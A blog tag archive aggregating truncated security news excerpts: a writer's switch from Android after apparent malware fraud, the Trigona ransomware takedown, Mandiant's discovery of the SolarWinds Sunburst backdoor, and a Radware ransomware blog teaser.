Tag Archive for: story

Why I’ve switched from Android to iOS: A story of possible malware and why you can never be too careful

/in


Why I’ve switched from Android to iOS: A story of possible malware and why you can never be too careful

The price of freedom is (personal) vigilance. Image credit: Pexels/Towfiqu barbhuiya.

Editor’s note: This is a personal anecdote shared by a long-time HWZ writer and is not representative of the security postures afforded on any operating system. The writer has been a phone reviewer since the 2000s and has freelanced with HWZ since.

An unwilling switch from Android to iOS

I’ve been writing for HardwareZone for a while. I continued freelancing whenever I could, after moving on from my role to another career path back in the noughties. Those who know me and are reading this will say that I’ve been among the most ardent defenders of Android since I first laid hands on the HTC G1 Dream in 2008. 

While that early HWZ team was evenly divided between iOS and Android loyalists, I endured a lot of good-natured ribbing as one of Android’s loudest supporters. I would jump in to defend Google’s mobile OS at the slightest hint of debate. 

It helped that my colleagues were largely Android users in the roles I moved on to. Some even converted after a bout of “passionate” evangelism on my part.

Unfortunately, I can no longer express that enthusiasm for Android’s open-source ecosystem, as it was also my downfall. It led to a month of panic, frustration, and many missed deadlines.

(Editor’s note: Non-apology apology accepted.)

What prompted the change of heart? It’s probably malware and has been in the news lately.

Malware: never say never

What I never thought would happen to me, happened to me. Image credit: Pexels/Mikhail Nilov.

When I made my first public appearance with an iPhone 15 Pro Max earlier this month, there were exclamations of surprise and satisfaction from friends and family alike:

“You aren’t the real Count! What have they done to him!”

“Finally, you’ve come to your senses! Better late than never…”

Whether I had “come to my senses” is up for debate, but I knew for certain: I no longer felt safe using Android phones after losing hundreds of dollars in online transactions I did not know of, or approve of. 

As you’ve probably heard by now, there has been an exponentially growing number of scammers exploiting Android’s openness to third-party apps and accessibility…

Source…

Feel-good story of the week: 2 ransomware gangs meet their demise

/in


A ransom note is plastered across a laptop monitor.

From the warm-and-fuzzy files comes this feel-good Friday post, chronicling this week’s takedown of two hated ransomware groups. One vanished on Tuesday, allegedly after being hacked by a group claiming allegiance to Ukraine. The other was taken out a day later thanks to an international police dragnet.

The first group, calling itself Trigona, saw the content on its dark web victim naming-and-shaming site pulled down and replaced with a banner proclaiming: “Trigona is gone! The servers of Trigona ransomware gang has been infiltrated and wiped out.” An outfit calling itself Ukrainian Cyber Alliance took credit and included the tagline: “disrupting Russian criminal enterprises (both public and private) since 2014.”

Poor operational security

A social media post from a user claiming to be a Ukrainian Cyber Alliance press secretary said his group targeted ransomware groups partly because they consider themselves out of reach of Western law enforcement.

“We just found one gang like that and did to them as they do to the rest,” the press secretary wrote. “Downloaded their servers (ten of them), deleted everything and defaced for the last time. TOR didn’t help them or even knowing they had a hole in it. Their entire infrastructure is completely blown away. Such a hunt forward.’”

A separate social media post dumped what the press secretary said was an administrative panel key and said the group wiped out Trigona’s “landing, blog, leaks site, internal server (rocketchat, atlassian), wallets and dev servers.” The person also claimed that the Ukrainian Cyber Alliance hacked a Confluence server Trigona used.

Screenshot showing purported hacker's control of Trigona Confluence server.
Enlarge / Screenshot showing purported hacker’s control of Trigona Confluence server.

By Friday, the Trigona site was unavailable, as evidenced by the message “Onionsite not found.”

Trigona first surfaced in 2022 with close ties to ransomware groups known as CryLock and BlackCat and looser ties to ALPHV. It primarily hacked companies in the US and India, followed by Israel, Turkey, Brazil, and Italy. It was known for compromising MYSQL servers,…

Source…

SolarWinds: The Untold Story of the Boldest Supply-Chain Hack

/in


But they had been at it only 24 hours when they found the passage they’d been looking for: a single file that appeared to be responsible for the rogue traffic. Carmakal believes it was December 11 when they found it.

The file was a .dll, or dynamic-link library—code components shared by other programs. This .dll was large, containing about 46,000 lines of code that performed more than 4,000 legitimate actions, and—as they found after analyzing it for an hour—one illegitimate one.

The main job of the .dll was to tell SolarWinds about a customer’s Orion usage. But the hackers had embedded malicious code that made it transmit intelligence about the victim’s network to their command server instead. Ballenthin dubbed the rogue code “Sunburst”—a play on SolarWinds. They were ecstatic about the discovery. But now they had to figure out how the intruders had snuck it into the Orion .dll.

This was far from trivial. The Orion .dll file was signed with a SolarWinds digital certificate, which was supposed to verify that the file was legitimate company code. One possibility was that the attackers had stolen the digital certificate, created a corrupt version of the Orion file, signed the file to make it look authentic, then installed the corrupt .dll on Mandiant’s server. Or, more alarmingly, they might have breached SolarWinds’ network and altered the legitimate Orion .dll source code before SolarWinds compiled it—converting the code into software—and signed it. The second scenario seemed so far-fetched that the Mandiant crew didn’t really consider it—until an investigator downloaded an Orion software update from the SolarWinds website. The backdoor was in it.

The implication was staggering. The Orion software suite had about 33,000 customers, some of whom had started receiving the hacked software update in March. That meant some customers might have been compromised for eight months already. The Mandiant team was facing a textbook example of a software-supply-chain attack—the nefarious alteration of trusted software at its source. In a single stroke, attackers can infect thousands, potentially millions, of machines.

In 2017 hackers had sabotaged a software supply…

Source…

Radware Customers Share Their Personal Ransomware Story

/in


Just the word ransom lets you know that ransomware isn’t a welcome visitor. No industry is immune to it. In fact, many attacks on healthcare systems have prevented patients from getting medical care. Yes, it can be that evil.

The post Radware Customers Share Their Personal Ransomware Story appeared first on Radware Blog.

*** This is a Security Bloggers Network syndicated blog from Radware Blog authored by Radware Customers. Read the original post at: https://blog.radware.com/all/customer-corner/2023/03/radware-customers-share-their-ransomware-story/

Source…